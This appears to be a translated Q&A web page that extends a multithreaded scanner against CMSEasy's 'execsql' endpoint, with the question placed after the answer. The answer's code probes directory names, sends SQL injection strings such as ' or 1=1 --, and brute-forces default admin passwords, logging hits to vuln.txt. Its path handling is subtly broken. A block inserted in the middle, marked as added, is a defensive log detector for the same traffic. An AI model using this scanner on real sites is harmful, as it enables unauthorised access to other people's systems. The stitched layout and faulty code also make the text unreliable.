1. Add some common directory and file names to the scan, for example test.php, index.php, admin.php and so on.

2. Add some common injection strings, for example `' or 1=1 --`, `' or 1=1#`, `' or '1'='1` and so on.

3. Add some common default account/password pairs for back-end admin systems to the scan, for example admin/admin, admin/123456, root/root and so on.

Concrete code implementation:

Add the directories and file names to scan

```python
dirs = ['test', 'admin', 'manager', 'data', 'config']
files = ['test.php', 'index.php', 'admin.php', 'login.php']
```

Add the injection strings

```python
injects = ["' or 1=1 --", "' or 1=1#", "' or '1'='1"]
```

Add the default back-end admin credentials

```python
users = ['admin', 'root', 'administrator']
passwords = ['admin', 'root', 'password', '123456']
```

```python
def check_url(url):
    # check directories and file names
    for d in dirs:
        url1 = url + '/' + d
        check_single_url(url1)

        for f in files:
            url2 = url1 + '/' + f
            check_single_url(url2)

    # check injection strings
    for inject in injects:
        url3 = url + "/?case=crossall&act=execsql&sql=" + inject
        check_single_url(url3)

    # check default admin credentials
    for user in users:
        for password in passwords:
            url4 = url + "/admin/login.php?do=login"
            data = {'username': user, 'password': password}
            headers = {'User-Agent': get_ua()}
            res = requests.post(url4, verify=False, headers=headers, data=data, timeout=5)
            if res.status_code == 200 and '登录失败' not in res.text:
                print("\033[32m[+]{} {} {}\033[0m".format(url4, user, password))
                wirte_targets(url4, "vuln.txt")
```

```python
def check_single_url(url):
    # keep only scheme and host of the given URL; the probe path is fixed below
    url = parse.urlparse(url)
    url = '{}://{}'.format(url[0], url[1])
    url = url + "/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5"
    headers = {'User-Agent': get_ua()}
    try:
        res = requests.get(url, verify=False, allow_redirects=False, headers=headers, timeout=5)
        if res.status_code == 200 and 'password' in res.text:
            print("\033[32m[+]{}\033[0m".format(url))
            wirte_targets(url, "vuln.txt")
    except Exception:
        pass  # timeouts and connection errors are silently skipped
```

Modify the call in the multithreading function

```python
if url is not None and filename is None:
    check_single_url(url)
elif url is None and filename is not None:
    for i in open(filename):
        i = i.replace('\n', '')
        url_list.append(i)
    for url in url_list:
        check_url(url)
```
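Seen from the defending side, the three behaviours added above (the CMSEasy execsql probe, the boolean-injection strings and the repeated admin login POSTs) leave distinct traces in a web server's access log. The detector below is an added example and is not code from the original post or from the scanner it modifies; the log lines are constructed, the probe signature, injection fragments and login path are taken from the code above, and the burst threshold is an assumed value.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /?case=crossall&act=execsql&sql=opaque_blob HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /?case=crossall&act=execsql&sql=%27%20or%201%3D1%20-- HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "POST /admin/login.php?do=login HTTP/1.1" 200 1024
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "POST /admin/login.php?do=login HTTP/1.1" 200 1024
203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "POST /admin/login.php?do=login HTTP/1.1" 200 1024
198.51.100.2 - - [10/Oct/2023:14:01:02 +0000] "GET /index.php HTTP/1.1" 200 2048
198.51.100.2 - - [10/Oct/2023:14:01:05 +0000] "POST /admin/login.php?do=login HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+'
)
SQLI_MARKERS = ("' or 1=1", "' or '1'='1")  # fragments used by the injects list above
LOGIN_THRESHOLD = 3  # login POSTs from one IP before flagging credential guessing (assumed value)

def parse_line(line):
    """Split one log line into its fields, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text):
    """Return (ip, finding) tuples for the three scanner behaviours described above."""
    findings = []
    login_posts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parsed = urlparse(rec["path"])
        qs = parse_qs(parsed.query, keep_blank_values=True)  # percent-decodes the values
        # 1. CMSEasy execsql probe: any request carrying case=crossall&act=execsql
        if qs.get("case") == ["crossall"] and qs.get("act") == ["execsql"]:
            findings.append((rec["ip"], "cmseasy_execsql_probe"))
            # 2. classic boolean-injection fragments inside the sql parameter
            sql = qs.get("sql", [""])[0].lower()
            if any(marker in sql for marker in SQLI_MARKERS):
                findings.append((rec["ip"], "sqli_payload"))
        # 3. default-credential guessing: repeated POSTs to the admin login from one source
        if rec["method"] == "POST" and parsed.path == "/admin/login.php" and qs.get("do") == ["login"]:
            login_posts[rec["ip"]] += 1
            if login_posts[rec["ip"]] == LOGIN_THRESHOLD:
                findings.append((rec["ip"], "admin_login_burst"))
    return findings
```

On the constructed log the scanning host 203.0.113.7 produces four findings (two probes, one injection payload, one login burst), while the single login POST from 198.51.100.2 stays below the threshold.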

Analyze how the detection success rate of the code below could be improved, and give concrete code:

```python
import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import re
import random
#body=cmseasyediturl
```

Original source: https://www.cveoy.top/t/topic/czRF. Copyright belongs to the author; do not repost or scrape!
